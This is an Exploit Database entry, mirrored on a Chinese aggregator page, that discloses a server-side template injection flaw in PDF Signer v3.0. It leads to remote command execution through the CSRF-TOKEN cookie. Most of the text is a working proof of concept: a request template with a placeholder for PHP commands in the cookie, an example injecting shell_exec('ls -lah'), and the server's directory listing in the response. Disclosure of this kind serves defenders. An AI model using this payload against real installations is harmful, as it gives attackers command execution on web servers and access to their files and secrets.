PDF Signer 3.0 – Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)

• Exploit Database
• 34 阅读

• 作者： dd_
  日期： 2019-01-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46276/

• # Exploit Title: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie
  # Dork: N/A
  # Date: 2019-01-28
  # Exploit Author: dd_ (info@malicious.group)
  # Vendor Homepage: https://codecanyon.net/user/simcy_creative
  # Software Link: https://codecanyon.net/item/signer-create-digital-signatures-and-sign-pdf-documents-online/20737707
  # Version: v3.0
  # Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
  # Vendor Banner: Signer v3.0 – Create Digital signatures and Sign PDF documents
  # Research IRC: irc.blackcatz.org #blackcatz
  
  # Vulnerability: Server-Side Template Injection leading to Remote Command Execution due to improper Cookie handling and improper CSRF implementation.
  
  # POC:
  # 1)
  
  GET / HTTP/1.1
  Host: signer.local
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Referer: http://signer.local/signin/?secure=true
  Connection: close
  Cookie: CSRF-TOKEN=rnqvt{{[PHP_COMMAND_HERE]}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
  Upgrade-Insecure-Requests: 1
  
  # Example
  
  [REQUEST]
  
  GET / HTTP/1.1
  Host: signer.local
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Referer: http://signer.local/signin/?secure=true
  Connection: close
  Cookie: CSRF-TOKEN=rnqvt{{shell_exec('ls -lah')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl
  Upgrade-Insecure-Requests: 1
  
  [RESPONSE]
  
  --half way down page---snip--
  
  <label>Folder name</label>
  <input type="text" class="form-control" name="foldername" placeholder="Folder name" data-parsley-required="true">
  <input type="hidden" name="folder" value="1">
  <input type="hidden" name="folderid">
  <input type="hidden" name="csrf-token" value="rnqvttotal 112K
  drwxr-xr-x9 www-data www-data 4.0K Jan 28 12:04 .
  drwxr-xr-x6 www-data www-data 4.0K Jan 28 06:19 ..
  -rw-r--r--1 www-data www-data 1.1K Jan 28 12:03 .env
  -rw-r--r--1 www-data www-data532 Jan9 20:52 .htaccess
  drwxr-xr-x9 www-data www-data 4.0K Jan9 20:53 assets
  -rw-r--r--1 www-data www-data947 Jan9 20:52 composer.json
  -rw-r--r--1 www-data www-data54K Jan9 20:52 composer.lock
  drwxr-xr-x2 www-data www-data 4.0K Jan 28 11:59 config
  -rw-r--r--1 www-data www-data 1.7K Jan9 20:52 cron.php
  -rw-r--r--1 www-data www-data169 Jan9 20:52 index.php
  drwxr-xr-x3 www-data www-data 4.0K Jan9 20:53 lang
  drwxr-xr-x6 www-data www-data 4.0K Jan 28 11:46 src
  drwxr-xr-x9 www-data www-data 4.0K Jan9 20:53 uploads
  drwxr-xr-x 24 www-data www-data 4.0K Jan9 20:53 vendor
  drwxr-xr-x6 www-data www-data 4.0K Jan9 20:53 views
  to5gw" />
  </div>
  </div>
  </div>
  
  --- snip ---